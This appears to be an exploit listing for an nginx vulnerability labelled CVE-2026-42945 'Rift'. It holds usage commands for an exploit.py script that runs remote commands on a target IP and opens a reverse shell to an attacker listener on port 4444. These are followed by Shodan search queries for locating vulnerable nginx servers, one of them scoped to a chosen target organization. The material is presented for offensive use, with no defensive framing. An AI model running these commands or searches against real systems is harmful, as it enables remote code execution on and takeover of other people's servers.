## https://sploitus.com/exploit?id=5ACFBA03-104F-5AF5-AAF1-FB5B7870BF2F
# CVE-2026-42945-NGINX-Rift
```bash
# Basic usage with target IP
python3 exploit.py --target-ip 192.168.1.100 --cmd "id"
# With custom port
python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id"
# Reverse shell
python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1 --listen-port 4444
# Using the old --host parameter (still works)
python3 exploit.py --host 192.168.1.100 --cmd "id"
```
## Shodan Search Queries
### Primary Shodan Search Queries:
```bash
# Most specific - looking for nginx with the rift vulnerability pattern
http.title:"nginx" port:"19321"
# More general nginx search on non-standard ports
nginx port:"19321"
# Search for nginx with potential rift vulnerability indicators
"nginx/1." "19321"
# Search for nginx on high ports (common for test/dev environments)
nginx port:"8000-9000" http.title:"nginx"
# Search for nginx with specific headers that might indicate vulnerable config
"Server: nginx" "X-Delay"
```
### More Targeted Queries:
```bash
# Looking for nginx on the specific port used in the exploit
port:19321 nginx
# Find nginx servers that might be running in development environments
nginx "Welcome to nginx" port:8080,8000,8888,19321
# Search for nginx with unusual port ranges (where rift might be deployed)
nginx port:10000-20000
# Combining with HTTP methods that might indicate the rift endpoint
"POST /spray" http.title:nginx
```
### Advanced Shodan Filters:
```bash
# Very specific - looking for the exact port and nginx
port:19321 org:"Your Target Organization"
# Find nginx on all non-standard ports (excluding 80,443,8080)
nginx -port:80,443,8080
# Search by country and nginx on specific port
port:19321 country:US nginx
# Find nginx with potential debug/admin interfaces
http.title:"nginx" http.status:200 port:8000-9000
```